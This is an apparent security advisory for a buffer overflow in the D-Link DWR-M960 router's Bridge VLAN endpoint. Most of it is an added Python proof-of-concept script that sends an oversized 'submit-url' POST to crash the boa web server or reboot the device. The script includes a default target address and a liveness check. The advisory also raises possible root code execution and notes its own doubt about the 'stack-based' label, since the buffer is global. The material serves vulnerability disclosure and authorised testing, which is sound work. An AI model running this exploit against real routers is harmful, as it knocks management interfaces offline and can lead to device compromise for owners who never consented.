D-Link DWR-M960 Stack-Based Buffer Overflow Vulnerability in Bridge VLAN Configuration Endpoint
Vulnerability
A stack-based buffer overflow has been reported in the D-Link DWR-M960 router's Bridge VLAN configuration endpoint, '/boafrm/formBridgeVlan', handled by the function 'sub_42B5A0'. The handler copies the 'submit-url' POST parameter into the global buffer 'wizard_htm' with 'strcpy', without comparing the parameter's length to the buffer's size, so a request carrying an oversized 'submit-url' writes past the end of the buffer. Note that the destination named here, 'wizard_htm', is a global buffer: an overflow of a global lands in the data segment rather than in a stack frame, so the "stack-based" classification and the exact memory being overwritten should be confirmed against the firmware before building on them.
Impact
Sending the oversized parameter crashes the boa web server or causes the device to reboot, a denial of service against the management interface. Because the overflow corrupts the memory adjacent to the buffer, there is additional potential for arbitrary code execution if an attacker can overwrite function pointers or other control data; since boa runs as root on the device, any such code would execute with root privileges.
Reproduction
To reproduce, send an HTTP POST to '/boafrm/formBridgeVlan' containing the 'save_apply' parameter and a 'submit-url' value longer than the 'wizard_htm' buffer. The remaining VLAN form fields are not strictly required: they can be omitted if the request still passes the handler's initial checks, or if the handler falls back to valid default values for the missing fields. A successful trigger is observed as the web server ceasing to respond or the device rebooting.
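The request described above, written out as a small proof-of-concept builder. This is an added example, not the original reporter's code: the router address 192.168.0.1, plain HTTP on port 80, the 'save_apply' value of "1", and the liveness probe of '/' are assumptions, not details from the advisory. Only the two parameters the report names are sent.

```python
"""PoC request builder for the DWR-M960 '/boafrm/formBridgeVlan' overflow.

Added example, not the advisory's own code. Assumed (not from the advisory):
the router answers plain HTTP at DEFAULT_ROUTER, the Boa form handler takes
application/x-www-form-urlencoded bodies, and a GET of '/' is a good enough
liveness check to tell whether boa crashed or the device rebooted.
"""
import socket
import sys
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/boafrm/formBridgeVlan"   # endpoint named in the advisory
DEFAULT_ROUTER = "http://192.168.0.1"  # assumed LAN address of the router


def build_payload(length: int, filler: bytes = b"A") -> bytes:
    """Return the URL-encoded POST body: 'save_apply' plus an oversized 'submit-url'.

    'length' is the decoded length of the submit-url value; the other VLAN form
    fields are deliberately left out to keep the request minimal.
    """
    if length <= 0:
        raise ValueError("length must be positive")
    submit_url = (filler * (length // len(filler) + 1))[:length]
    return urllib.parse.urlencode(
        {"save_apply": "1", "submit-url": submit_url}  # "1" is an assumed value
    ).encode("ascii")


def parse_payload(body: bytes) -> dict:
    """Decode a body produced by build_payload, for sanity-checking the request."""
    fields = urllib.parse.parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def post_form(router: str, body: bytes, timeout: float = 5.0) -> str:
    """POST 'body' to the vulnerable endpoint and classify what happened.

    'response' means boa answered (any status code, so the copy did not crash
    it); 'reset' or 'timeout' are consistent with the server dying mid-request
    or the device rebooting; 'refused' means nothing is listening any more.
    """
    req = urllib.request.Request(
        router + ENDPOINT,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
            return "response"
    except urllib.error.HTTPError:
        return "response"                 # 4xx/5xx still proves boa is alive
    except urllib.error.URLError as exc:
        reason = exc.reason
        if isinstance(reason, (socket.timeout, TimeoutError)):
            return "timeout"
        if isinstance(reason, ConnectionRefusedError):
            return "refused"
        if isinstance(reason, ConnectionResetError):
            return "reset"
        return "error"
    except (socket.timeout, TimeoutError):
        return "timeout"                  # read stalled after connecting
    except ConnectionResetError:
        return "reset"                    # peer closed while we were sending


def is_alive(router: str, timeout: float = 3.0) -> bool:
    """Probe the web root; False once boa has crashed or the device is rebooting."""
    try:
        with urllib.request.urlopen(router + "/", timeout=timeout) as resp:
            resp.read(64)
            return True
    except urllib.error.HTTPError:
        return True                       # an error page is still a live server
    except (urllib.error.URLError, OSError):
        return False


def main(argv):
    router = argv[1] if len(argv) > 1 else DEFAULT_ROUTER
    length = int(argv[2]) if len(argv) > 2 else 4096  # chosen to exceed any sane buffer
    body = build_payload(length)
    print(f"[*] {router}{ENDPOINT}: sending submit-url of {length} bytes")
    print(f"[*] outcome: {post_form(router, body)}")
    print(f"[*] web server alive afterwards: {is_alive(router)}")


if __name__ == "__main__":
    main(sys.argv)
```

Run as `python3 poc.py http://192.168.0.1 4096` against a device you are authorised to test; an outcome of 'reset' or 'timeout' followed by `alive: False` matches the crash-or-reboot behaviour the advisory describes, while 'response' with the server still alive means the chosen length did not trigger it. Start with a length well above any plausible buffer and step down only if you need to estimate the buffer size.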
